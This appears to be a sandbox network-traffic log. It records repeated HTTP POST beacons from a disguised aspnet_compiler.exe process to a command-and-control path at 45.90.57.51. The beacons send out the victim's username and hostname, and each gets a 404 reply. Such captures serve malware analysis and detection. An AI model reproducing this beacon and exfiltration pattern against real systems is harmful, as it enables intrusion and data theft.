                  May 16, 2024 00:37:45.530427933 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:45.770276070 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:46.034174919 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.54974045.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:47.452852011 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:47.692492962 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:47.955065966 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.54974245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:49.343816996 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:49.584079027 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:49.847440958 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.54974345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:51.232609987 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:51.472027063 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:51.736666918 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.54974445.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:53.120054960 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:53.357475042 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:53.617485046 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.54974545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:55.010656118 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:55.246855021 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:55.510827065 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.54974645.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:57.099162102 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:57.338119984 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:57.604254961 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.54974745.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:59.470457077 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:59.710521936 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:59.975322962 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.54974845.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:01.356158972 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:01.594136000 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:01.857131004 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.54974945.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:03.239293098 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:03.484527111 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:03.750636101 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.54975045.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:05.193094015 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:05.428921938 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:05.694541931 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.54975145.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:07.071739912 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:07.305646896 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:07.563893080 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.54975245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:08.955748081 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:09.197555065 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:09.462527037 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.54975345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:10.859695911 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:11.100202084 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:11.363615036 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.54975545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:12.750489950 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:12.990989923 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:13.256185055 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.54975645.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:15.699410915 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:15.940907955 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:16.216450930 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.54975745.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:17.603709936 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:17.851574898 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:18.130280972 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.54975845.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:19.541568995 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:19.775937080 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:20.039736032 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.54975945.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:21.430033922 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:21.663501024 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:21.924787045 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.54976045.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:23.333174944 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:23.573502064 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:23.839876890 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
